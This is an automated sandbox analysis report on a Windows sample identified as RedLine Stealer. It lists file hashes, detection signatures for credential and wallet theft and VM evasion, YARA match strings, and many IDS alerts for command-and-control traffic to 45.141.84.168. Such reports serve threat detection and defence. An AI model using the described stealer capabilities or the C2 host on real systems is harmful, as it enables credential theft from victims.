Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Kyuo21uNlG.exe

Overview

General Information

Sample name:Kyuo21uNlG.exe
renamed because original name is a hash value
Original sample name:a499adf007df84fc58178a1fd861138c078731760bea948501259c8e83e19783.exe
Analysis ID:1564529
MD5:2b209f07c6251e367835fbf30e7c348e
SHA1:cd5534d4871aeba9351941cf548b2e63f492a609
SHA256:a499adf007df84fc58178a1fd861138c078731760bea948501259c8e83e19783
Tags:45-141-84-168exeuser-JAMESWT_MHT
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Kyuo21uNlG.exe (PID: 7340 cmdline: "C:\Users\user\Desktop\Kyuo21uNlG.exe" MD5: 2B209F07C6251E367835FBF30E7C348E)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
No configs have been found
SourceRuleDescriptionAuthorStrings
Kyuo21uNlG.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Kyuo21uNlG.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      Kyuo21uNlG.exeMALWARE_Win_Arechclient2Detects Arechclient2 RATditekSHen
      • 0xb864a:$s14: keybd_event
      • 0xbf3b9:$v1_1: grabber@
      • 0xb921c:$v1_2: <BrowserProfile>k__
      • 0xb9c95:$v1_3: <SystemHardwares>k__
      • 0xb9d54:$v1_5: <ScannedWallets>k__
      • 0xb9de4:$v1_6: <DicrFiles>k__
      • 0xb9dc0:$v1_7: <MessageClientFiles>k__
      • 0xba18a:$v1_8: <ScanBrowsers>k__BackingField
      • 0xba1dc:$v1_8: <ScanWallets>k__BackingField
      • 0xba1f9:$v1_8: <ScanScreen>k__BackingField
      • 0xba233:$v1_8: <ScanVPN>k__BackingField
      • 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost
      • 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1673629570.0000000000422000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000000.1673629570.0000000000422000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          Process Memory Space: Kyuo21uNlG.exe PID: 7340JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: Kyuo21uNlG.exe PID: 7340JoeSecurity_RedLineYara detected RedLine StealerJoe Security
              SourceRuleDescriptionAuthorStrings
              0.0.Kyuo21uNlG.exe.420000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.0.Kyuo21uNlG.exe.420000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.0.Kyuo21uNlG.exe.420000.0.unpackMALWARE_Win_Arechclient2Detects Arechclient2 RATditekSHen
                  • 0xb864a:$s14: keybd_event
                  • 0xbf3b9:$v1_1: grabber@
                  • 0xb921c:$v1_2: <BrowserProfile>k__
                  • 0xb9c95:$v1_3: <SystemHardwares>k__
                  • 0xb9d54:$v1_5: <ScannedWallets>k__
                  • 0xb9de4:$v1_6: <DicrFiles>k__
                  • 0xb9dc0:$v1_7: <MessageClientFiles>k__
                  • 0xba18a:$v1_8: <ScanBrowsers>k__BackingField
                  • 0xba1dc:$v1_8: <ScanWallets>k__BackingField
                  • 0xba1f9:$v1_8: <ScanScreen>k__BackingField
                  • 0xba233:$v1_8: <ScanVPN>k__BackingField
                  • 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost
                  • 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-28T13:39:03.810385+010020292171Malware Command and Control Activity Detected45.141.84.16815647192.168.2.449730TCP
                  2024-11-28T13:40:48.833000+010020292171Malware Command and Control Activity Detected45.141.84.16815647192.168.2.449890TCP
                  2024-11-28T13:40:54.410196+010020292171Malware Command and Control Activity Detected45.141.84.16815647192.168.2.449906TCP
                  2024-11-28T13:40:59.282056+010020292171Malware Command and Control Activity Detected45.141.84.16815647192.168.2.449913TCP
                  2024-11-28T13:41:01.958149+010020292171Malware Command and Control Activity Detected45.141.84.16815647192.168.2.449916TCP
                  2024-11-28T13:41:12.593114+010020292171Malware Command and Control Activity Detected45.141.84.16815647192.168.2.449923TCP
                  2024-11-28T13:41:19.868692+010020292171Malware Command and Control Activity Detected45.141.84.16815647192.168.2.449928TCP
                  2024-11-28T13:41:23.227086+010020292171Malware Command and Control Activity Detected45.141.84.16815647192.168.2.449932TCP
                  2024-11-28T13:41:31.542222+010020292171Malware Command and Control Activity Detected45.141.84.16815647192.168.2.449938TCP
                  2024-11-28T13:41:38.808685+010020292171Malware Command and Control Activity Detected45.141.84.16815647192.168.2.449943TCP
                  2024-11-28T13:41:49.660661+010020292171Malware Command and Control Activity Detected45.141.84.16815647192.168.2.449951TCP
                  2024-11-28T13:42:03.638458+010020292171Malware Command and Control Activity Detected45.141.84.16815647192.168.2.449961TCP
                  2024-11-28T13:42:21.876762+010020292171Malware Command and Control Activity Detected45.141.84.16815647192.168.2.449973TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-28T13:39:02.605748+010020519101A Network Trojan was detected192.168.2.44973045.141.84.16815647TCP
                  2024-11-28T13:39:02.737268+010020519101A Network Trojan was detected192.168.2.44973045.141.84.16815647TCP
                  2024-11-28T13:39:02.857967+010020519101A Network Trojan was detected192.168.2.44973045.141.84.16815647TCP
                  2024-11-28T13:39:02.978189+010020519101A Network Trojan was detected192.168.2.44973045.141.84.16815647TCP
                  2024-11-28T13:39:03.098541+010020519101A Network Trojan was detected192.168.2.44973045.141.84.16815647TCP
                  2024-11-28T13:39:03.218911+010020519101A Network Trojan was detected192.168.2.44973045.141.84.16815647TCP
                  2024-11-28T13:39:03.339993+010020519101A Network Trojan was detected192.168.2.44973045.141.84.16815647TCP
                  2024-11-28T13:39:03.460463+010020519101A Network Trojan was detected192.168.2.44973045.141.84.16815647TCP
                  2024-11-28T13:39:03.580554+010020519101A Network Trojan was detected192.168.2.44973045.141.84.16815647TCP
                  2024-11-28T13:39:03.700537+010020519101A Network Trojan was detected192.168.2.44973045.141.84.16815647TCP
                  2024-11-28T13:39:03.810560+010020519101A Network Trojan was detected192.168.2.44973045.141.84.16815647TCP
                  2024-11-28T13:39:03.930687+010020519101A Network Trojan was detected192.168.2.44973045.141.84.16815647TCP
                  2024-11-28T13:39:04.051051+010020519101A Network Trojan was detected192.168.2.44973045.141.84.16815647TCP
                  2024-11-28T13:39:04.171683+010020519101A Network Trojan was detected192.168.2.44973045.141.84.16815647TCP
                  2024-11-28T13:39:04.291826+010020519101A Network Trojan was detected192.168.2.44973045.141.84.16815647TCP
                  2024-11-28T13:39:04.524071+010020519101A Network Trojan was detected192.168.2.44973045.141.84.16815647TCP
                  2024-11-28T13:39:04.644208+010020519101A Network Trojan was detected192.168.2.44973045.141.84.16815647TCP
                  2024-11-28T13:40:47.544779+010020519101A Network Trojan was detected192.168.2.44989045.141.84.16815647TCP
                  2024-11-28T13:40:47.732172+010020519101A Network Trojan was detected192.168.2.44989045.141.84.16815647TCP
                  2024-11-28T13:40:48.761807+010020519101A Network Trojan was detected192.168.2.44989045.141.84.16815647TCP
                  2024-11-28T13:40:51.967836+010020519101A Network Trojan was detected192.168.2.44990145.141.84.16815647TCP
                  2024-11-28T13:40:52.252025+010020519101A Network Trojan was detected192.168.2.44990145.141.84.16815647TCP
                  2024-11-28T13:40:53.163084+010020519101A Network Trojan was detected192.168.2.44990645.141.84.16815647TCP
                  2024-11-28T13:40:53.405285+010020519101A Network Trojan was detected192.168.2.44990645.141.84.16815647TCP
                  2024-11-28T13:40:53.477189+010020519101A Network Trojan was detected192.168.2.44990645.141.84.16815647TCP
                  2024-11-28T13:40:54.247697+010020519101A Network Trojan was detected192.168.2.44990645.141.84.16815647TCP
                  2024-11-28T13:40:58.041114+010020519101A Network Trojan was detected192.168.2.44991345.141.84.16815647TCP
                  2024-11-28T13:40:58.253774+010020519101A Network Trojan was detected192.168.2.44991345.141.84.16815647TCP
                  2024-11-28T13:40:59.086750+010020519101A Network Trojan was detected192.168.2.44991345.141.84.16815647TCP
                  2024-11-28T13:40:59.206923+010020519101A Network Trojan was detected192.168.2.44991345.141.84.16815647TCP
                  2024-11-28T13:41:00.716468+010020519101A Network Trojan was detected192.168.2.44991645.141.84.16815647TCP
                  2024-11-28T13:41:01.008223+010020519101A Network Trojan was detected192.168.2.44991645.141.84.16815647TCP
                  2024-11-28T13:41:11.337641+010020519101A Network Trojan was detected192.168.2.44992345.141.84.16815647TCP
                  2024-11-28T13:41:11.654964+010020519101A Network Trojan was detected192.168.2.44992345.141.84.16815647TCP
                  2024-11-28T13:41:12.566273+010020519101A Network Trojan was detected192.168.2.44992345.141.84.16815647TCP
                  2024-11-28T13:41:18.616548+010020519101A Network Trojan was detected192.168.2.44992845.141.84.16815647TCP
                  2024-11-28T13:41:19.738166+010020519101A Network Trojan was detected192.168.2.44992845.141.84.16815647TCP
                  2024-11-28T13:41:19.828042+010020519101A Network Trojan was detected192.168.2.44992845.141.84.16815647TCP
                  2024-11-28T13:41:21.152007+010020519101A Network Trojan was detected192.168.2.44993145.141.84.16815647TCP
                  2024-11-28T13:41:21.658990+010020519101A Network Trojan was detected192.168.2.44993145.141.84.16815647TCP
                  2024-11-28T13:41:21.736687+010020519101A Network Trojan was detected192.168.2.44993145.141.84.16815647TCP
                  2024-11-28T13:41:21.899235+010020519101A Network Trojan was detected192.168.2.44993145.141.84.16815647TCP
                  2024-11-28T13:41:22.032046+010020519101A Network Trojan was detected192.168.2.44993245.141.84.16815647TCP
                  2024-11-28T13:41:23.102661+010020519101A Network Trojan was detected192.168.2.44993245.141.84.16815647TCP
                  2024-11-28T13:41:23.222728+010020519101A Network Trojan was detected192.168.2.44993245.141.84.16815647TCP
                  2024-11-28T13:41:30.247064+010020519101A Network Trojan was detected192.168.2.44993845.141.84.16815647TCP
                  2024-11-28T13:41:30.398220+010020519101A Network Trojan was detected192.168.2.44993845.141.84.16815647TCP
                  2024-11-28T13:41:30.476322+010020519101A Network Trojan was detected192.168.2.44993845.141.84.16815647TCP
                  2024-11-28T13:41:30.742437+010020519101A Network Trojan was detected192.168.2.44993845.141.84.16815647TCP
                  2024-11-28T13:41:31.167732+010020519101A Network Trojan was detected192.168.2.44993845.141.84.16815647TCP
                  2024-11-28T13:41:37.566955+010020519101A Network Trojan was detected192.168.2.44994345.141.84.16815647TCP
                  2024-11-28T13:41:48.464421+010020519101A Network Trojan was detected192.168.2.44995145.141.84.16815647TCP
                  2024-11-28T13:41:48.631573+010020519101A Network Trojan was detected192.168.2.44995145.141.84.16815647TCP
                  2024-11-28T13:41:48.683573+010020519101A Network Trojan was detected192.168.2.44995145.141.84.16815647TCP
                  2024-11-28T13:42:02.344742+010020519101A Network Trojan was detected192.168.2.44996145.141.84.16815647TCP
                  2024-11-28T13:42:02.479646+010020519101A Network Trojan was detected192.168.2.44996145.141.84.16815647TCP
                  2024-11-28T13:42:02.828918+010020519101A Network Trojan was detected192.168.2.44996145.141.84.16815647TCP
                  2024-11-28T13:42:03.505766+010020519101A Network Trojan was detected192.168.2.44996145.141.84.16815647TCP
                  2024-11-28T13:42:20.635069+010020519101A Network Trojan was detected192.168.2.44997345.141.84.16815647TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-28T13:39:07.501207+010020522481A Network Trojan was detected192.168.2.44973145.141.84.1689000TCP
                  2024-11-28T13:39:09.149989+010020522481A Network Trojan was detected192.168.2.44973245.141.84.1689000TCP
                  2024-11-28T13:39:10.789910+010020522481A Network Trojan was detected192.168.2.44973345.141.84.1689000TCP
                  2024-11-28T13:39:12.415846+010020522481A Network Trojan was detected192.168.2.44973445.141.84.1689000TCP
                  2024-11-28T13:39:14.009083+010020522481A Network Trojan was detected192.168.2.44973545.141.84.1689000TCP
                  2024-11-28T13:39:15.542087+010020522481A Network Trojan was detected192.168.2.44973645.141.84.1689000TCP
                  2024-11-28T13:39:17.140441+010020522481A Network Trojan was detected192.168.2.44973745.141.84.1689000TCP
                  2024-11-28T13:39:18.680644+010020522481A Network Trojan was detected192.168.2.44973845.141.84.1689000TCP
                  2024-11-28T13:39:20.312721+010020522481A Network Trojan was detected192.168.2.44973945.141.84.1689000TCP
                  2024-11-28T13:39:21.902667+010020522481A Network Trojan was detected192.168.2.44974145.141.84.1689000TCP
                  2024-11-28T13:39:23.522706+010020522481A Network Trojan was detected192.168.2.44974345.141.84.1689000TCP
                  2024-11-28T13:39:25.154117+010020522481A Network Trojan was detected192.168.2.44974445.141.84.1689000TCP
                  2024-11-28T13:39:26.749083+010020522481A Network Trojan was detected192.168.2.44974745.141.84.1689000TCP
                  2024-11-28T13:39:28.345826+010020522481A Network Trojan was detected192.168.2.44974945.141.84.1689000TCP
                  2024-11-28T13:39:29.977727+010020522481A Network Trojan was detected192.168.2.44975045.141.84.1689000TCP
                  2024-11-28T13:39:31.625008+010020522481A Network Trojan was detected192.168.2.44975245.141.84.1689000TCP
                  2024-11-28T13:39:33.222466+010020522481A Network Trojan was detected192.168.2.44975345.141.84.1689000TCP
                  2024-11-28T13:39:34.762339+010020522481A Network Trojan was detected192.168.2.44975445.141.84.1689000TCP
                  2024-11-28T13:39:36.981105+010020522481A Network Trojan was detected192.168.2.44975545.141.84.1689000TCP
                  2024-11-28T13:39:38.619160+010020522481A Network Trojan was detected192.168.2.44975645.141.84.1689000TCP
                  2024-11-28T13:39:40.258478+010020522481A Network Trojan was detected192.168.2.44975745.141.84.1689000TCP
                  2024-11-28T13:39:41.837423+010020522481A Network Trojan was detected192.168.2.44975845.141.84.1689000TCP
                  2024-11-28T13:39:43.415097+010020522481A Network Trojan was detected192.168.2.44975945.141.84.1689000TCP
                  2024-11-28T13:39:44.994184+010020522481A Network Trojan was detected192.168.2.44976045.141.84.1689000TCP
                  2024-11-28T13:39:46.586171+010020522481A Network Trojan was detected192.168.2.44976145.141.84.1689000TCP
                  2024-11-28T13:39:48.170454+010020522481A Network Trojan was detected192.168.2.44976245.141.84.1689000TCP
                  2024-11-28T13:39:49.947572+010020522481A Network Trojan was detected192.168.2.44976345.141.84.1689000TCP
                  2024-11-28T13:39:51.495333+010020522481A Network Trojan was detected192.168.2.44976445.141.84.1689000TCP
                  2024-11-28T13:39:53.041809+010020522481A Network Trojan was detected192.168.2.44976545.141.84.1689000TCP
                  2024-11-28T13:39:54.680630+010020522481A Network Trojan was detected192.168.2.44976645.141.84.1689000TCP
                  2024-11-28T13:39:56.306803+010020522481A Network Trojan was detected192.168.2.44976745.141.84.1689000TCP
                  2024-11-28T13:39:57.857156+010020522481A Network Trojan was detected192.168.2.44976845.141.84.1689000TCP
                  2024-11-28T13:40:07.209428+010020522481A Network Trojan was detected192.168.2.44976945.141.84.1689000TCP
                  2024-11-28T13:40:08.838892+010020522481A Network Trojan was detected192.168.2.44978345.141.84.1689000TCP
                  2024-11-28T13:40:10.525996+010020522481A Network Trojan was detected192.168.2.44978745.141.84.1689000TCP
                  2024-11-28T13:40:12.123021+010020522481A Network Trojan was detected192.168.2.44979345.141.84.1689000TCP
                  2024-11-28T13:40:13.712398+010020522481A Network Trojan was detected192.168.2.44979845.141.84.1689000TCP
                  2024-11-28T13:40:15.290685+010020522481A Network Trojan was detected192.168.2.44980045.141.84.1689000TCP
                  2024-11-28T13:40:16.843353+010020522481A Network Trojan was detected192.168.2.44980445.141.84.1689000TCP
                  2024-11-28T13:40:18.431014+010020522481A Network Trojan was detected192.168.2.44980845.141.84.1689000TCP
                  2024-11-28T13:40:21.491941+010020522481A Network Trojan was detected192.168.2.44981345.141.84.1689000TCP
                  2024-11-28T13:40:23.118493+010020522481A Network Trojan was detected192.168.2.44982145.141.84.1689000TCP
                  2024-11-28T13:40:24.716158+010020522481A Network Trojan was detected192.168.2.44982545.141.84.1689000TCP
                  2024-11-28T13:40:26.334197+010020522481A Network Trojan was detected192.168.2.44982845.141.84.1689000TCP
                  2024-11-28T13:40:27.922756+010020522481A Network Trojan was detected192.168.2.44983445.141.84.1689000TCP
                  2024-11-28T13:40:29.509919+010020522481A Network Trojan was detected192.168.2.44983945.141.84.1689000TCP
                  2024-11-28T13:40:31.058977+010020522481A Network Trojan was detected192.168.2.44984145.141.84.1689000TCP
                  2024-11-28T13:40:32.661092+010020522481A Network Trojan was detected192.168.2.44984645.141.84.1689000TCP
                  2024-11-28T13:40:34.291194+010020522481A Network Trojan was detected192.168.2.44985245.141.84.1689000TCP
                  2024-11-28T13:40:35.841017+010020522481A Network Trojan was detected192.168.2.44985545.141.84.1689000TCP
                  2024-11-28T13:40:37.477393+010020522481A Network Trojan was detected192.168.2.44986045.141.84.1689000TCP
                  2024-11-28T13:40:39.010162+010020522481A Network Trojan was detected192.168.2.44986545.141.84.1689000TCP
                  2024-11-28T13:40:40.650289+010020522481A Network Trojan was detected192.168.2.44987045.141.84.1689000TCP
                  2024-11-28T13:40:43.344168+010020522481A Network Trojan was detected192.168.2.44987345.141.84.1689000TCP
                  2024-11-28T13:40:44.886131+010020522481A Network Trojan was detected192.168.2.44987945.141.84.1689000TCP
                  2024-11-28T13:40:46.480623+010020522481A Network Trojan was detected192.168.2.44988245.141.84.1689000TCP
                  2024-11-28T13:40:48.030188+010020522481A Network Trojan was detected192.168.2.44988845.141.84.1689000TCP
                  2024-11-28T13:40:49.621495+010020522481A Network Trojan was detected192.168.2.44989245.141.84.1689000TCP
                  2024-11-28T13:40:51.219233+010020522481A Network Trojan was detected192.168.2.44989645.141.84.1689000TCP
                  2024-11-28T13:40:52.806633+010020522481A Network Trojan was detected192.168.2.44990045.141.84.1689000TCP
                  2024-11-28T13:40:54.387585+010020522481A Network Trojan was detected192.168.2.44990445.141.84.1689000TCP
                  2024-11-28T13:40:56.948683+010020522481A Network Trojan was detected192.168.2.44990945.141.84.1689000TCP
                  2024-11-28T13:40:58.495646+010020522481A Network Trojan was detected192.168.2.44991245.141.84.1689000TCP
                  2024-11-28T13:41:00.044429+010020522481A Network Trojan was detected192.168.2.44991445.141.84.1689000TCP
                  2024-11-28T13:41:01.702921+010020522481A Network Trojan was detected192.168.2.44991545.141.84.1689000TCP
                  2024-11-28T13:41:03.247744+010020522481A Network Trojan was detected192.168.2.44991745.141.84.1689000TCP
                  2024-11-28T13:41:04.794916+010020522481A Network Trojan was detected192.168.2.44991845.141.84.1689000TCP
                  2024-11-28T13:41:06.339533+010020522481A Network Trojan was detected192.168.2.44991945.141.84.1689000TCP
                  2024-11-28T13:41:07.935564+010020522481A Network Trojan was detected192.168.2.44992045.141.84.1689000TCP
                  2024-11-28T13:41:09.526532+010020522481A Network Trojan was detected192.168.2.44992145.141.84.1689000TCP
                  2024-11-28T13:41:11.106439+010020522481A Network Trojan was detected192.168.2.44992245.141.84.1689000TCP
                  2024-11-28T13:41:12.929682+010020522481A Network Trojan was detected192.168.2.44992445.141.84.1689000TCP
                  2024-11-28T13:41:14.802788+010020522481A Network Trojan was detected192.168.2.44992545.141.84.1689000TCP
                  2024-11-28T13:41:16.951964+010020522481A Network Trojan was detected192.168.2.44992645.141.84.1689000TCP
                  2024-11-28T13:41:18.541880+010020522481A Network Trojan was detected192.168.2.44992745.141.84.1689000TCP
                  2024-11-28T13:41:20.166373+010020522481A Network Trojan was detected192.168.2.44992945.141.84.1689000TCP
                  2024-11-28T13:41:21.794007+010020522481A Network Trojan was detected192.168.2.44993045.141.84.1689000TCP
                  2024-11-28T13:41:23.563109+010020522481A Network Trojan was detected192.168.2.44993345.141.84.1689000TCP
                  2024-11-28T13:41:25.106157+010020522481A Network Trojan was detected192.168.2.44993445.141.84.1689000TCP
                  2024-11-28T13:41:26.712779+010020522481A Network Trojan was detected192.168.2.44993545.141.84.1689000TCP
                  2024-11-28T13:41:28.338995+010020522481A Network Trojan was detected192.168.2.44993645.141.84.1689000TCP
                  2024-11-28T13:41:30.317679+010020522481A Network Trojan was detected192.168.2.44993745.141.84.1689000TCP
                  2024-11-28T13:41:31.951857+010020522481A Network Trojan was detected192.168.2.44993945.141.84.1689000TCP
                  2024-11-28T13:41:34.556172+010020522481A Network Trojan was detected192.168.2.44994045.141.84.1689000TCP
                  2024-11-28T13:41:36.138965+010020522481A Network Trojan was detected192.168.2.44994145.141.84.1689000TCP
                  2024-11-28T13:41:37.736989+010020522481A Network Trojan was detected192.168.2.44994245.141.84.1689000TCP
                  2024-11-28T13:41:39.334890+010020522481A Network Trojan was detected192.168.2.44994445.141.84.1689000TCP
                  2024-11-28T13:41:40.920696+010020522481A Network Trojan was detected192.168.2.44994545.141.84.1689000TCP
                  2024-11-28T13:41:42.471043+010020522481A Network Trojan was detected192.168.2.44994645.141.84.1689000TCP
                  2024-11-28T13:41:44.060255+010020522481A Network Trojan was detected192.168.2.44994745.141.84.1689000TCP
                  2024-11-28T13:41:45.661572+010020522481A Network Trojan was detected192.168.2.44994845.141.84.1689000TCP
                  2024-11-28T13:41:47.296279+010020522481A Network Trojan was detected192.168.2.44994945.141.84.1689000TCP
                  2024-11-28T13:41:48.939972+010020522481A Network Trojan was detected192.168.2.44995045.141.84.1689000TCP
                  2024-11-28T13:41:50.491844+010020522481A Network Trojan was detected192.168.2.44995245.141.84.1689000TCP
                  2024-11-28T13:41:52.084298+010020522481A Network Trojan was detected192.168.2.44995345.141.84.1689000TCP
                  2024-11-28T13:41:53.637272+010020522481A Network Trojan was detected192.168.2.44995445.141.84.1689000TCP
                  2024-11-28T13:41:55.232041+010020522481A Network Trojan was detected192.168.2.44995545.141.84.1689000TCP
                  2024-11-28T13:41:56.785166+010020522481A Network Trojan was detected192.168.2.44995645.141.84.1689000TCP
                  2024-11-28T13:41:58.374841+010020522481A Network Trojan was detected192.168.2.44995745.141.84.1689000TCP
                  2024-11-28T13:42:00.013919+010020522481A Network Trojan was detected192.168.2.44995845.141.84.1689000TCP
                  2024-11-28T13:42:01.611228+010020522481A Network Trojan was detected192.168.2.44995945.141.84.1689000TCP
                  2024-11-28T13:42:03.204054+010020522481A Network Trojan was detected192.168.2.44996045.141.84.1689000TCP
                  2024-11-28T13:42:04.761150+010020522481A Network Trojan was detected192.168.2.44996245.141.84.1689000TCP
                  2024-11-28T13:42:06.347698+010020522481A Network Trojan was detected192.168.2.44996345.141.84.1689000TCP
                  2024-11-28T13:42:07.939331+010020522481A Network Trojan was detected192.168.2.44996445.141.84.1689000TCP
                  2024-11-28T13:42:09.728079+010020522481A Network Trojan was detected192.168.2.44996545.141.84.1689000TCP
                  2024-11-28T13:42:11.313901+010020522481A Network Trojan was detected192.168.2.44996645.141.84.1689000TCP
                  2024-11-28T13:42:12.910159+010020522481A Network Trojan was detected192.168.2.44996745.141.84.1689000TCP
                  2024-11-28T13:42:14.504969+010020522481A Network Trojan was detected192.168.2.44996845.141.84.1689000TCP
                  2024-11-28T13:42:16.138859+010020522481A Network Trojan was detected192.168.2.44996945.141.84.1689000TCP
                  2024-11-28T13:42:17.781610+010020522481A Network Trojan was detected192.168.2.44997045.141.84.1689000TCP
                  2024-11-28T13:42:19.424083+010020522481A Network Trojan was detected192.168.2.44997145.141.84.1689000TCP
                  2024-11-28T13:42:21.027305+010020522481A Network Trojan was detected192.168.2.44997245.141.84.1689000TCP
                  2024-11-28T13:42:22.568931+010020522481A Network Trojan was detected192.168.2.44997445.141.84.1689000TCP
                  2024-11-28T13:42:24.155808+010020522481A Network Trojan was detected192.168.2.44997545.141.84.1689000TCP
                  2024-11-28T13:42:25.749848+010020522481A Network Trojan was detected192.168.2.44997645.141.84.1689000TCP
                  2024-11-28T13:42:27.345500+010020522481A Network Trojan was detected192.168.2.44997745.141.84.1689000TCP
                  2024-11-28T13:42:28.991135+010020522481A Network Trojan was detected192.168.2.44997845.141.84.1689000TCP
                  2024-11-28T13:42:30.576070+010020522481A Network Trojan was detected192.168.2.44997945.141.84.1689000TCP
                  2024-11-28T13:42:32.225635+010020522481A Network Trojan was detected192.168.2.44998045.141.84.1689000TCP
                  2024-11-28T13:42:33.813239+010020522481A Network Trojan was detected192.168.2.44998145.141.84.1689000TCP
                  2024-11-28T13:42:35.405198+010020522481A Network Trojan was detected192.168.2.44998245.141.84.1689000TCP
                  2024-11-28T13:42:37.007022+010020522481A Network Trojan was detected192.168.2.44998345.141.84.1689000TCP
                  2024-11-28T13:42:38.597044+010020522481A Network Trojan was detected192.168.2.44998445.141.84.1689000TCP
                  2024-11-28T13:42:40.242100+010020522481A Network Trojan was detected192.168.2.44998545.141.84.1689000TCP
                  2024-11-28T13:42:41.826395+010020522481A Network Trojan was detected192.168.2.44998645.141.84.1689000TCP
                  2024-11-28T13:42:43.374547+010020522481A Network Trojan was detected192.168.2.44998745.141.84.1689000TCP
                  2024-11-28T13:42:44.922815+010020522481A Network Trojan was detected192.168.2.44998845.141.84.1689000TCP
                  2024-11-28T13:42:46.560796+010020522481A Network Trojan was detected192.168.2.44998945.141.84.1689000TCP
                  2024-11-28T13:42:48.164596+010020522481A Network Trojan was detected192.168.2.44999045.141.84.1689000TCP
                  2024-11-28T13:42:49.749887+010020522481A Network Trojan was detected192.168.2.44999145.141.84.1689000TCP
                  2024-11-28T13:42:51.341654+010020522481A Network Trojan was detected192.168.2.44999245.141.84.1689000TCP
                  2024-11-28T13:42:52.938296+010020522481A Network Trojan was detected192.168.2.44999345.141.84.1689000TCP
                  2024-11-28T13:42:54.541732+010020522481A Network Trojan was detected192.168.2.44999445.141.84.1689000TCP
                  2024-11-28T13:42:56.123998+010020522481A Network Trojan was detected192.168.2.44999545.141.84.1689000TCP
                  2024-11-28T13:42:57.716050+010020522481A Network Trojan was detected192.168.2.44999645.141.84.1689000TCP
                  2024-11-28T13:42:59.342861+010020522481A Network Trojan was detected192.168.2.44999745.141.84.1689000TCP
                  2024-11-28T13:43:00.893919+010020522481A Network Trojan was detected192.168.2.44999845.141.84.1689000TCP
                  2024-11-28T13:43:02.486801+010020522481A Network Trojan was detected192.168.2.44999945.141.84.1689000TCP
                  2024-11-28T13:43:04.168530+010020522481A Network Trojan was detected192.168.2.45000045.141.84.1689000TCP
                  2024-11-28T13:43:05.797522+010020522481A Network Trojan was detected192.168.2.45000145.141.84.1689000TCP
                  2024-11-28T13:43:07.343641+010020522481A Network Trojan was detected192.168.2.45000245.141.84.1689000TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-28T13:39:15.542087+010028033053Unknown Traffic192.168.2.44973645.141.84.1689000TCP
                  2024-11-28T13:39:20.312721+010028033053Unknown Traffic192.168.2.44973945.141.84.1689000TCP
                  2024-11-28T13:39:21.902667+010028033053Unknown Traffic192.168.2.44974145.141.84.1689000TCP
                  2024-11-28T13:39:25.154117+010028033053Unknown Traffic192.168.2.44974445.141.84.1689000TCP
                  2024-11-28T13:39:28.345826+010028033053Unknown Traffic192.168.2.44974945.141.84.1689000TCP
                  2024-11-28T13:39:31.625008+010028033053Unknown Traffic192.168.2.44975245.141.84.1689000TCP
                  2024-11-28T13:39:41.837423+010028033053Unknown Traffic192.168.2.44975845.141.84.1689000TCP
                  2024-11-28T13:39:46.586171+010028033053Unknown Traffic192.168.2.44976145.141.84.1689000TCP
                  2024-11-28T13:39:53.041809+010028033053Unknown Traffic192.168.2.44976545.141.84.1689000TCP
                  2024-11-28T13:39:54.680630+010028033053Unknown Traffic192.168.2.44976645.141.84.1689000TCP
